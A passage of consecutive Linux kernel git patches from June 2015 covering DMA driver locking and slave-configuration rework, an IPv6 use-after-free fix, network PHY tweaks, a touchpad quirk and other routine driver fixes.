desc); } - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); } static void at_xdmac_handle_cyclic(struct at_xdmac_chan *atchan) @@ -1116,12 +1122,13 @@ static int at_xdmac_device_config(struct dma_chan *chan, { struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); int ret; + unsigned long flags; dev_dbg(chan2dev(chan), "%s\n", __func__); - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); ret = at_xdmac_set_slave_config(chan, config); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return ret; } @@ -1130,18 +1137,19 @@ static int at_xdmac_device_pause(struct dma_chan *chan) { struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); struct at_xdmac *atxdmac = to_at_xdmac(atchan->chan.device); + unsigned long flags; dev_dbg(chan2dev(chan), "%s\n", __func__); if (test_and_set_bit(AT_XDMAC_CHAN_IS_PAUSED, &atchan->status)) return 0; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); at_xdmac_write(atxdmac, AT_XDMAC_GRWS, atchan->mask); while (at_xdmac_chan_read(atchan, AT_XDMAC_CC) & (AT_XDMAC_CC_WRIP | AT_XDMAC_CC_RDIP)) cpu_relax(); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return 0; } @@ -1150,18 +1158,19 @@ static int at_xdmac_device_resume(struct dma_chan *chan) { struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); struct at_xdmac *atxdmac = to_at_xdmac(atchan->chan.device); + unsigned long flags; dev_dbg(chan2dev(chan), "%s\n", __func__); - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); if (!at_xdmac_chan_is_paused(atchan)) { - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return 0; } at_xdmac_write(atxdmac, AT_XDMAC_GRWR, atchan->mask); clear_bit(AT_XDMAC_CHAN_IS_PAUSED, &atchan->status); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return 0; } @@ -1171,10 +1180,11 @@ static int at_xdmac_device_terminate_all(struct dma_chan *chan) struct at_xdmac_desc *desc, *_desc; struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); struct at_xdmac *atxdmac = to_at_xdmac(atchan->chan.device); + unsigned long flags; dev_dbg(chan2dev(chan), "%s\n", __func__); - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); at_xdmac_write(atxdmac, AT_XDMAC_GD, atchan->mask); while (at_xdmac_read(atxdmac, AT_XDMAC_GS) & atchan->mask) cpu_relax(); @@ -1184,7 +1194,7 @@ static int at_xdmac_device_terminate_all(struct dma_chan *chan) at_xdmac_remove_xfer(atchan, desc); clear_bit(AT_XDMAC_CHAN_IS_CYCLIC, &atchan->status); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return 0; } @@ -1194,8 +1204,9 @@ static int at_xdmac_alloc_chan_resources(struct dma_chan *chan) struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); struct at_xdmac_desc *desc; int i; + unsigned long flags; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); if (at_xdmac_chan_is_enabled(atchan)) { dev_err(chan2dev(chan), @@ -1226,7 +1237,7 @@ static int at_xdmac_alloc_chan_resources(struct dma_chan *chan) dev_dbg(chan2dev(chan), "%s: allocated %d descriptors\n", __func__, i); spin_unlock: - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return i; } From 765c37d876698268eea8b820081ac8fc9d0fc8bc Mon Sep 17 00:00:00 2001 From: Ludovic Desroches Date: Mon, 8 Jun 2015 10:33:15 +0200 Subject: [PATCH 777/872] dmaengine: at_xdmac: rework slave configuration part Rework slave configuration part in order to more report wrong errors about the configuration. Only maxburst and addr width values are checked when doing the slave configuration. The validity of the channel configuration is done at prepare time. Signed-off-by: Ludovic Desroches Cc: stable@vger.kernel.org # 4.0 and later Signed-off-by: Vinod Koul --- drivers/dma/at_xdmac.c | 156 +++++++++++++++++++++++++---------------- 1 file changed, 96 insertions(+), 60 deletions(-) diff --git a/drivers/dma/at_xdmac.c b/drivers/dma/at_xdmac.c index 0dcc9a7a90af..7992164ea9ec 100644 --- a/drivers/dma/at_xdmac.c +++ b/drivers/dma/at_xdmac.c @@ -174,6 +174,8 @@ #define AT_XDMAC_MBR_UBC_NDV3 (0x3 << 27) /* Next Descriptor View 3 */ #define AT_XDMAC_MAX_CHAN 0x20 +#define AT_XDMAC_MAX_CSIZE 16 /* 16 data */ +#define AT_XDMAC_MAX_DWIDTH 8 /* 64 bits */ #define AT_XDMAC_DMA_BUSWIDTHS\ (BIT(DMA_SLAVE_BUSWIDTH_UNDEFINED) |\ @@ -192,20 +194,17 @@ struct at_xdmac_chan { struct dma_chan chan; void __iomem *ch_regs; u32 mask; /* Channel Mask */ - u32 cfg[2]; /* Channel Configuration Register */ - #define AT_XDMAC_DEV_TO_MEM_CFG 0 /* Predifined dev to mem channel conf */ - #define AT_XDMAC_MEM_TO_DEV_CFG 1 /* Predifined mem to dev channel conf */ + u32 cfg; /* Channel Configuration Register */ u8 perid; /* Peripheral ID */ u8 perif; /* Peripheral Interface */ u8 memif; /* Memory Interface */ - u32 per_src_addr; - u32 per_dst_addr; u32 save_cc; u32 save_cim; u32 save_cnda; u32 save_cndc; unsigned long status; struct tasklet_struct tasklet; + struct dma_slave_config sconfig; spinlock_t lock; @@ -495,61 +494,94 @@ static struct dma_chan *at_xdmac_xlate(struct of_phandle_args *dma_spec, return chan; } +static int at_xdmac_compute_chan_conf(struct dma_chan *chan, + enum dma_transfer_direction direction) +{ + struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); + int csize, dwidth; + + if (direction == DMA_DEV_TO_MEM) { + atchan->cfg = + AT91_XDMAC_DT_PERID(atchan->perid) + | AT_XDMAC_CC_DAM_INCREMENTED_AM + | AT_XDMAC_CC_SAM_FIXED_AM + | AT_XDMAC_CC_DIF(atchan->memif) + | AT_XDMAC_CC_SIF(atchan->perif) + | AT_XDMAC_CC_SWREQ_HWR_CONNECTED + | AT_XDMAC_CC_DSYNC_PER2MEM + | AT_XDMAC_CC_MBSIZE_SIXTEEN + | AT_XDMAC_CC_TYPE_PER_TRAN; + csize = ffs(atchan->sconfig.src_maxburst) - 1; + if (csize < 0) { + dev_err(chan2dev(chan), "invalid src maxburst value\n"); + return -EINVAL; + } + atchan->cfg |= AT_XDMAC_CC_CSIZE(csize); + dwidth = ffs(atchan->sconfig.src_addr_width) - 1; + if (dwidth < 0) { + dev_err(chan2dev(chan), "invalid src addr width value\n"); + return -EINVAL; + } + atchan->cfg |= AT_XDMAC_CC_DWIDTH(dwidth); + } else if (direction == DMA_MEM_TO_DEV) { + atchan->cfg = + AT91_XDMAC_DT_PERID(atchan->perid) + | AT_XDMAC_CC_DAM_FIXED_AM + | AT_XDMAC_CC_SAM_INCREMENTED_AM + | AT_XDMAC_CC_DIF(atchan->perif) + | AT_XDMAC_CC_SIF(atchan->memif) + | AT_XDMAC_CC_SWREQ_HWR_CONNECTED + | AT_XDMAC_CC_DSYNC_MEM2PER + | AT_XDMAC_CC_MBSIZE_SIXTEEN + | AT_XDMAC_CC_TYPE_PER_TRAN; + csize = ffs(atchan->sconfig.dst_maxburst) - 1; + if (csize < 0) { + dev_err(chan2dev(chan), "invalid src maxburst value\n"); + return -EINVAL; + } + atchan->cfg |= AT_XDMAC_CC_CSIZE(csize); + dwidth = ffs(atchan->sconfig.dst_addr_width) - 1; + if (dwidth < 0) { + dev_err(chan2dev(chan), "invalid dst addr width value\n"); + return -EINVAL; + } + atchan->cfg |= AT_XDMAC_CC_DWIDTH(dwidth); + } + + dev_dbg(chan2dev(chan), "%s: cfg=0x%08x\n", __func__, atchan->cfg); + + return 0; +} + +/* + * Only check that maxburst and addr width values are supported by the + * the controller but not that the configuration is good to perform the + * transfer since we don't know the direction at this stage. + */ +static int at_xdmac_check_slave_config(struct dma_slave_config *sconfig) +{ + if ((sconfig->src_maxburst > AT_XDMAC_MAX_CSIZE) + || (sconfig->dst_maxburst > AT_XDMAC_MAX_CSIZE)) + return -EINVAL; + + if ((sconfig->src_addr_width > AT_XDMAC_MAX_DWIDTH) + || (sconfig->dst_addr_width > AT_XDMAC_MAX_DWIDTH)) + return -EINVAL; + + return 0; +} + static int at_xdmac_set_slave_config(struct dma_chan *chan, struct dma_slave_config *sconfig) { struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); - u8 dwidth; - int csize; - atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG] = - AT91_XDMAC_DT_PERID(atchan->perid) - | AT_XDMAC_CC_DAM_INCREMENTED_AM - | AT_XDMAC_CC_SAM_FIXED_AM - | AT_XDMAC_CC_DIF(atchan->memif) - | AT_XDMAC_CC_SIF(atchan->perif) - | AT_XDMAC_CC_SWREQ_HWR_CONNECTED - | AT_XDMAC_CC_DSYNC_PER2MEM - | AT_XDMAC_CC_MBSIZE_SIXTEEN - | AT_XDMAC_CC_TYPE_PER_TRAN; - csize = at_xdmac_csize(sconfig->src_maxburst); - if (csize < 0) { - dev_err(chan2dev(chan), "invalid src maxburst value\n"); + if (at_xdmac_check_slave_config(sconfig)) { + dev_err(chan2dev(chan), "invalid slave configuration\n"); return -EINVAL; } - atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG] |= AT_XDMAC_CC_CSIZE(csize); - dwidth = ffs(sconfig->src_addr_width) - 1; - atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG] |= AT_XDMAC_CC_DWIDTH(dwidth); - - - atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG] = - AT91_XDMAC_DT_PERID(atchan->perid) - | AT_XDMAC_CC_DAM_FIXED_AM - | AT_XDMAC_CC_SAM_INCREMENTED_AM - | AT_XDMAC_CC_DIF(atchan->perif) - | AT_XDMAC_CC_SIF(atchan->memif) - | AT_XDMAC_CC_SWREQ_HWR_CONNECTED - | AT_XDMAC_CC_DSYNC_MEM2PER - | AT_XDMAC_CC_MBSIZE_SIXTEEN - | AT_XDMAC_CC_TYPE_PER_TRAN; - csize = at_xdmac_csize(sconfig->dst_maxburst); - if (csize < 0) { - dev_err(chan2dev(chan), "invalid src maxburst value\n"); - return -EINVAL; - } - atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG] |= AT_XDMAC_CC_CSIZE(csize); - dwidth = ffs(sconfig->dst_addr_width) - 1; - atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG] |= AT_XDMAC_CC_DWIDTH(dwidth); - - /* Src and dst addr are needed to configure the link list descriptor. */ - atchan->per_src_addr = sconfig->src_addr; - atchan->per_dst_addr = sconfig->dst_addr; - dev_dbg(chan2dev(chan), - "%s: cfg[dev2mem]=0x%08x, cfg[mem2dev]=0x%08x, per_src_addr=0x%08x, per_dst_addr=0x%08x\n", - __func__, atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG], - atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG], - atchan->per_src_addr, atchan->per_dst_addr); + memcpy(&atchan->sconfig, sconfig, sizeof(atchan->sconfig)); return 0; } @@ -583,6 +615,9 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, /* Protect dma_sconfig field that can be modified by set_slave_conf. */ spin_lock_irqsave(&atchan->lock, irqflags); + if (at_xdmac_compute_chan_conf(chan, direction)) + goto spin_unlock; + /* Prepare descriptors. */ for_each_sg(sgl, sg, sg_len, i) { struct at_xdmac_desc *desc = NULL; @@ -607,14 +642,13 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, /* Linked list descriptor setup. */ if (direction == DMA_DEV_TO_MEM) { - desc->lld.mbr_sa = atchan->per_src_addr; + desc->lld.mbr_sa = atchan->sconfig.src_addr; desc->lld.mbr_da = mem; - desc->lld.mbr_cfg = atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG]; } else { desc->lld.mbr_sa = mem; - desc->lld.mbr_da = atchan->per_dst_addr; - desc->lld.mbr_cfg = atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG]; + desc->lld.mbr_da = atchan->sconfig.dst_addr; } + desc->lld.mbr_cfg = atchan->cfg; dwidth = at_xdmac_get_dwidth(desc->lld.mbr_cfg); fixed_dwidth = IS_ALIGNED(len, 1 << dwidth) ? at_xdmac_get_dwidth(desc->lld.mbr_cfg) @@ -683,6 +717,9 @@ at_xdmac_prep_dma_cyclic(struct dma_chan *chan, dma_addr_t buf_addr, return NULL; } + if (at_xdmac_compute_chan_conf(chan, direction)) + return NULL; + for (i = 0; i < periods; i++) { struct at_xdmac_desc *desc = NULL; @@ -701,14 +738,13 @@ at_xdmac_prep_dma_cyclic(struct dma_chan *chan, dma_addr_t buf_addr, __func__, desc, &desc->tx_dma_desc.phys); if (direction == DMA_DEV_TO_MEM) { - desc->lld.mbr_sa = atchan->per_src_addr; + desc->lld.mbr_sa = atchan->sconfig.src_addr; desc->lld.mbr_da = buf_addr + i * period_len; - desc->lld.mbr_cfg = atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG]; } else { desc->lld.mbr_sa = buf_addr + i * period_len; - desc->lld.mbr_da = atchan->per_dst_addr; - desc->lld.mbr_cfg = atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG]; + desc->lld.mbr_da = atchan->sconfig.dst_addr; } + desc->lld.mbr_cfg = atchan->cfg; desc->lld.mbr_ubc = AT_XDMAC_MBR_UBC_NDV1 | AT_XDMAC_MBR_UBC_NDEN | AT_XDMAC_MBR_UBC_NSEN From 7f2ca8b55aeff1fe51ed3570200ef88a96060917 Mon Sep 17 00:00:00 2001 From: Peter Hutterer Date: Mon, 8 Jun 2015 10:17:32 -0700 Subject: [PATCH 778/872] Input: synaptics - add min/max quirk for Lenovo S540 https://bugzilla.redhat.com/show_bug.cgi?id=1223051#c2 Cc: stable@vger.kernel.org Tested-by: tommy.gagnes@gmail.com Signed-off-by: Peter Hutterer Signed-off-by: Dmitry Torokhov --- drivers/input/mouse/synaptics.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c index 630af73e98c4..35c8d0ceabee 100644 --- a/drivers/input/mouse/synaptics.c +++ b/drivers/input/mouse/synaptics.c @@ -150,6 +150,11 @@ static const struct min_max_quirk min_max_pnpid_table[] = { {ANY_BOARD_ID, 2961}, 1024, 5112, 2024, 4832 }, + { + (const char * const []){"LEN2000", NULL}, + {ANY_BOARD_ID, ANY_BOARD_ID}, + 1024, 5113, 2021, 4832 + }, { (const char * const []){"LEN2001", NULL}, {ANY_BOARD_ID, ANY_BOARD_ID}, @@ -191,7 +196,7 @@ static const char * const topbuttonpad_pnp_ids[] = { "LEN0045", "LEN0047", "LEN0049", - "LEN2000", + "LEN2000", /* S540 */ "LEN2001", /* Edge E431 */ "LEN2002", /* Edge E531 */ "LEN2003", From 27e41fcfa6b326ad44eee7e0b1930d080b270895 Mon Sep 17 00:00:00 2001 From: Robert Shearman Date: Fri, 5 Jun 2015 18:51:54 +0100 Subject: [PATCH 779/872] ipv6: fix possible use after free of dev stats The memory pointed to by idev->stats.icmpv6msgdev, idev->stats.icmpv6dev and idev->stats.ipv6 can each be used in an RCU read context without taking a reference on idev. For example, through IP6_*_STATS_* calls in ip6_rcv. These memory blocks are freed without waiting for an RCU grace period to elapse. This could lead to the memory being written to after it has been freed. Fix this by using call_rcu to free the memory used for stats, as well as idev after an RCU grace period has elapsed. Signed-off-by: Robert Shearman Acked-by: Hannes Frederic Sowa Signed-off-by: David S. Miller --- net/ipv6/addrconf_core.c | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/net/ipv6/addrconf_core.c b/net/ipv6/addrconf_core.c index d873ceea86e6..ca09bf49ac68 100644 --- a/net/ipv6/addrconf_core.c +++ b/net/ipv6/addrconf_core.c @@ -133,6 +133,14 @@ static void snmp6_free_dev(struct inet6_dev *idev) free_percpu(idev->stats.ipv6); } +static void in6_dev_finish_destroy_rcu(struct rcu_head *head) +{ + struct inet6_dev *idev = container_of(head, struct inet6_dev, rcu); + + snmp6_free_dev(idev); + kfree(idev); +} + /* Nobody refers to this device, we may destroy it. */ void in6_dev_finish_destroy(struct inet6_dev *idev) @@ -151,7 +159,6 @@ void in6_dev_finish_destroy(struct inet6_dev *idev) pr_warn("Freeing alive inet6 device %p\n", idev); return; } - snmp6_free_dev(idev); - kfree_rcu(idev, rcu); + call_rcu(&idev->rcu, in6_dev_finish_destroy_rcu); } EXPORT_SYMBOL(in6_dev_finish_destroy); From 0243508edd317ff1fa63b495643a7c192fbfcd92 Mon Sep 17 00:00:00 2001 From: Josh Hunt Date: Mon, 8 Jun 2015 12:00:59 -0400 Subject: [PATCH 780/872] ipv6: Fix protocol resubmission UDP encapsulation is broken on IPv6. This is because the logic to resubmit the nexthdr is inverted, checking for a ret value > 0 instead of < 0. Also, the resubmit label is in the wrong position since we already get the nexthdr value when performing decapsulation. In addition the skb pull is no longer necessary either. This changes the return value check to look for < 0, using it for the nexthdr on the next iteration, and moves the resubmit label to the proper location. With these changes the v6 code now matches what we do in the v4 ip input code wrt resubmitting when decapsulating. Signed-off-by: Josh Hunt Acked-by: "Tom Herbert" Signed-off-by: David S. Miller --- net/ipv6/ip6_input.c | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c index f2e464eba5ef..41a73da371a9 100644 --- a/net/ipv6/ip6_input.c +++ b/net/ipv6/ip6_input.c @@ -212,13 +212,13 @@ static int ip6_input_finish(struct sock *sk, struct sk_buff *skb) */ rcu_read_lock(); -resubmit: idev = ip6_dst_idev(skb_dst(skb)); if (!pskb_pull(skb, skb_transport_offset(skb))) goto discard; nhoff = IP6CB(skb)->nhoff; nexthdr = skb_network_header(skb)[nhoff]; +resubmit: raw = raw6_local_deliver(skb, nexthdr); ipprot = rcu_dereference(inet6_protos[nexthdr]); if (ipprot) { @@ -246,10 +246,12 @@ static int ip6_input_finish(struct sock *sk, struct sk_buff *skb) goto discard; ret = ipprot->handler(skb); - if (ret > 0) + if (ret < 0) { + nexthdr = -ret; goto resubmit; - else if (ret == 0) + } else if (ret == 0) { IP6_INC_STATS_BH(net, idev, IPSTATS_MIB_INDELIVERS); + } } else { if (!raw) { if (xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) { From afe3f907d20f39c0eaf81f2baec247ba672f34a9 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Mon, 8 Jun 2015 10:47:57 -0700 Subject: [PATCH 781/872] net: bcmgenet: power on MII block for all MII modes The RGMII block is currently only powered on when using RGMII or RGMII_NO_ID, which is not correct when using the GENET interface in MII or Reverse MII modes. We always need to power on the RGMII interface for this block to properly work, regardless of the MII mode in which we operate. Fixes: aa09677cba423 ("net: bcmgenet: add MDIO routines") Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- drivers/net/ethernet/broadcom/genet/bcmmii.c | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c index e7651b3c6c57..420949cc55aa 100644 --- a/drivers/net/ethernet/broadcom/genet/bcmmii.c +++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c @@ -299,9 +299,6 @@ int bcmgenet_mii_config(struct net_device *dev, bool init) phy_name = "external RGMII (no delay)"; else phy_name = "external RGMII (TX delay)"; - reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL); - reg |= RGMII_MODE_EN | id_mode_dis; - bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL); bcmgenet_sys_writel(priv, PORT_MODE_EXT_GPHY, SYS_PORT_CTRL); break; @@ -310,6 +307,15 @@ int bcmgenet_mii_config(struct net_device *dev, bool init) return -EINVAL; } + /* This is an external PHY (xMII), so we need to enable the RGMII + * block for the interface to work + */ + if (priv->ext_phy) { + reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL); + reg |= RGMII_MODE_EN | id_mode_dis; + bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL); + } + if (init) dev_info(kdev, "configuring instance for %s\n", phy_name); From bbbf2df0039d31c6a0a9708ce4fe220a54bd5379 Mon Sep 17 00:00:00 2001 From: Willem de Bruijn Date: Mon, 8 Jun 2015 11:53:08 -0400 Subject: [PATCH 782/872] net: replace last open coded skb_orphan_frags with function call Commit 70008aa50e92 ("skbuff: convert to skb_orphan_frags") replaced open coded tests of SKBTX_DEV_ZEROCOPY and skb_copy_ubufs with calls to helper function skb_orphan_frags. Apply that to the last remaining open coded site. Signed-off-by: Willem de Bruijn Acked-by: Michael S. Tsirkin Signed-off-by: David S. Miller --- net/core/dev.c | 11 ++--------- 1 file changed, 2 insertions(+), 9 deletions(-) diff --git a/net/core/dev.c b/net/core/dev.c index 2c1c67fad64d..aa82f9ab6a36 100644 --- a/net/core/dev.c +++ b/net/core/dev.c @@ -1718,15 +1718,8 @@ EXPORT_SYMBOL_GPL(is_skb_forwardable); int __dev_forward_skb(struct net_device *dev, struct sk_buff *skb) { - if (skb_shinfo(skb)->tx_flags & SKBTX_DEV_ZEROCOPY) { - if (skb_copy_ubufs(skb, GFP_ATOMIC)) { - atomic_long_inc(&dev->rx_dropped); - kfree_skb(skb); - return NET_RX_DROP; - } - } - - if (unlikely(!is_skb_forwardable(dev, skb))) { + if (skb_orphan_frags(skb, GFP_ATOMIC) || + unlikely(!is_skb_forwardable(dev, skb))) { atomic_long_inc(&dev->rx_dropped); kfree_skb(skb); return NET_RX_DROP; From 6da8253bdd3945b81377e4908d6d395a9956f8af Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Mon, 8 Jun 2015 11:05:20 -0700 Subject: [PATCH 783/872] net: phy: bcm7xxx: update workaround to fix 100BaseT corner cases Update the AFE_TX_CONFIG value to solve marginal rise/fall issues observed when the link is operating in 100BaseT. This workaround applies to GPHY revisions D0, E0 and newer. Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- drivers/net/phy/bcm7xxx.c | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/drivers/net/phy/bcm7xxx.c b/drivers/net/phy/bcm7xxx.c index b5dc59de094e..4dea85bfc545 100644 --- a/drivers/net/phy/bcm7xxx.c +++ b/drivers/net/phy/bcm7xxx.c @@ -136,8 +136,8 @@ static int bcm7xxx_28nm_d0_afe_config_init(struct phy_device *phydev) /* AFE_RX_LP_COUNTER, set RX bandwidth to maximum */ phy_write_misc(phydev, AFE_RX_LP_COUNTER, 0x7fc0); - /* AFE_TX_CONFIG, set 1000BT Cfeed=110 for all ports */ - phy_write_misc(phydev, AFE_TX_CONFIG, 0x0061); + /* AFE_TX_CONFIG, set 100BT Cfeed=011 to improve rise/fall time */ + phy_write_misc(phydev, AFE_TX_CONFIG, 0x431); /* AFE_VDCA_ICTRL_0, set Iq=1101 instead of 0111 for AB symmetry */ phy_write_misc(phydev, AFE_VDCA_ICTRL_0, 0xa7da); @@ -167,6 +167,9 @@ static int bcm7xxx_28nm_e0_plus_afe_config_init(struct phy_device *phydev) /* AFE_RXCONFIG_1, provide more margin for INL/DNL measurement */ phy_write_misc(phydev, AFE_RXCONFIG_1, 0x9b2f); + /* AFE_TX_CONFIG, set 100BT Cfeed=011 to improve rise/fall time */ + phy_write_misc(phydev, AFE_TX_CONFIG, 0x431); + /* AFE_VDCA_ICTRL_0, set Iq=1101 instead of 0111 for AB symmetry */ phy_write_misc(phydev, AFE_VDCA_ICTRL_0, 0xa7da); From 684b4ac14f4306c877834a8daaf0f0665128eae4 Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Mon, 8 Jun 2015 21:16:28 +0200 Subject: [PATCH 784/872] atm: use msecs_to_jiffies for conversions API compliance scanning with coccinelle flagged: ./drivers/atm/iphase.c:2621:4-20: WARNING: timeout (50) seems HZ dependent Numeric constants passed to schedule_timeout() make the effective timeout HZ dependent which does not seem intended. Fixed up by converting the constant to jiffies with msecs_to_jiffies() As this driver was introduced in the early 2.3 series it is most likely assuming HZ=100 so the constant 50 is converted to 500ms. Signed-off-by: Nicholas Mc Guire Signed-off-by: David S. Miller --- drivers/atm/iphase.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/atm/iphase.c b/drivers/atm/iphase.c index 924f8e26789d..65e65903faa0 100644 --- a/drivers/atm/iphase.c +++ b/drivers/atm/iphase.c @@ -2618,7 +2618,7 @@ static void ia_close(struct atm_vcc *vcc) if (vcc->qos.txtp.traffic_class != ATM_NONE) { iadev->close_pending++; prepare_to_wait(&iadev->timeout_wait, &wait, TASK_UNINTERRUPTIBLE); - schedule_timeout(50); + schedule_timeout(msecs_to_jiffies(500)); finish_wait(&iadev->timeout_wait, &wait); spin_lock_irqsave(&iadev->tx_lock, flags); while((skb = skb_dequeue(&iadev->tx_backlog))) { From ac7ba51c215db5739eb640f2f26025ced8668285 Mon Sep 17 00:00:00 2001 From: Dan Murphy Date: Mon, 8 Jun 2015 14:30:55 -0500 Subject: [PATCH 785/872] net: phy: dp83867: Fix device tree entries Fix the device tree entries to modify the '_' to '-'. Also changes the names of the internal delay properties from -int- to -internal- as the -int- appeared as a keyword. Signed-off-by: Dan Murphy Reviewed-by: Florian Fainelli Signed-off-by: David S. Miller --- .../devicetree/bindings/net/ti,dp83867.txt | 18 ++++++++++++------ drivers/net/phy/dp83867.c | 6 +++--- 2 files changed, 15 insertions(+), 9 deletions(-) diff --git a/Documentation/devicetree/bindings/net/ti,dp83867.txt b/Documentation/devicetree/bindings/net/ti,dp83867.txt index 46bb67a222ea..58d935b58598 100644 --- a/Documentation/devicetree/bindings/net/ti,dp83867.txt +++ b/Documentation/devicetree/bindings/net/ti,dp83867.txt @@ -2,18 +2,24 @@ Required properties: - reg - The ID number for the phy, usually a small integer - - ti,rx_int_delay - RGMII Recieve Clock Delay - see dt-bindings/net/ti-dp83867.h + - ti,rx-internal-delay - RGMII Recieve Clock Delay - see dt-bindings/net/ti-dp83867.h for applicable values - - ti,tx_int_delay - RGMII Transmit Clock Delay - see dt-bindings/net/ti-dp83867.h + - ti,tx-internal-delay - RGMII Transmit Clock Delay - see dt-bindings/net/ti-dp83867.h for applicable values - - ti,fifo_depth - Transmitt FIFO depth- see dt-bindings/net/ti-dp83867.h + - ti,fifo-depth - Transmitt FIFO depth- see dt-bindings/net/ti-dp83867.h for applicable values +Default child nodes are standard Ethernet PHY device +nodes as described in Documentation/devicetree/bindings/net/phy.txt + Example: ethernet-phy@0 { reg = <0>; - ti,rx_int_delay = ; - ti,tx_int_delay = ; - ti,fifo_depth = ; + ti,rx-internal-delay = ; + ti,tx-internal-delay = ; + ti,fifo-depth = ; }; + +Datasheet can be found: +http://www.ti.com/product/DP83867IR/datasheet diff --git a/drivers/net/phy/dp83867.c b/drivers/net/phy/dp83867.c index ef0b4eb15f8d..c7a12e2e07b7 100644 --- a/drivers/net/phy/dp83867.c +++ b/drivers/net/phy/dp83867.c @@ -113,17 +113,17 @@ static int dp83867_of_init(struct phy_device *phydev) if (!phydev->dev.of_node) return -ENODEV; - ret = of_property_read_u32(of_node, "ti,rx_int_delay", + ret = of_property_read_u32(of_node, "ti,rx-internal-delay", &dp83867->rx_id_delay); if (ret) return ret; - ret = of_property_read_u32(of_node, "ti,tx_int_delay", + ret = of_property_read_u32(of_node, "ti,tx-internal-delay", &dp83867->tx_id_delay); if (ret) return ret; - ret = of_property_read_u32(of_node, "ti,fifo_depth", + ret = of_property_read_u32(of_node, "ti,fifo-depth", &dp83867->fifo_depth); if (ret) return ret; From 2f4eb6a80e57845ef6f3f7d1cdaaec7a6ab480a9 Mon Sep 17 00:00:00 2001 From: Jon Mason Date: Sun, 5 Apr 2015 14:57:22 -0400 Subject: [PATCH 786/872] ntb: iounmap MW reg and vbase in error path The MW regbase and vbase(s) were not being freed if an error occurred in the vbase allocation loop. This is corrected by updating the error path for the allocation loop to err4. Reported-by: Julia Lawall Signed-off-by: Jon Mason --- drivers/ntb/ntb_hw.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/ntb/ntb_hw.c b/drivers/ntb/ntb_hw.c index cd29b1038c5e..b5c8707f4ac7 100644 --- a/drivers/ntb/ntb_hw.c +++ b/drivers/ntb/ntb_hw.c @@ -1778,7 +1778,7 @@ static int ntb_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id) dev_warn(&pdev->dev, "Cannot remap BAR %d\n", MW_TO_BAR(i)); rc = -EIO; - goto err3; + goto err4; } } From 132bd96bc56f9cafd24b71de389984d0e83a0956 Mon Sep 17 00:00:00 2001 From: Dave Airlie Date: Tue, 9 Jun 2015 13:39:31 +1000 Subject: [PATCH 787/872] ALSA: hda - fix number of devices query on hotplug The new regmap code seems to cache this, which isn't helpful for the hotplug dock situation where this gets updated. Use the uncached query for this. Signed-off-by: Dave Airlie Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_codec.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c index b49feff0a319..b7782212dd64 100644 --- a/sound/pci/hda/hda_codec.c +++ b/sound/pci/hda/hda_codec.c @@ -436,7 +436,7 @@ static unsigned int get_num_devices(struct hda_codec *codec, hda_nid_t nid) get_wcaps_type(wcaps) != 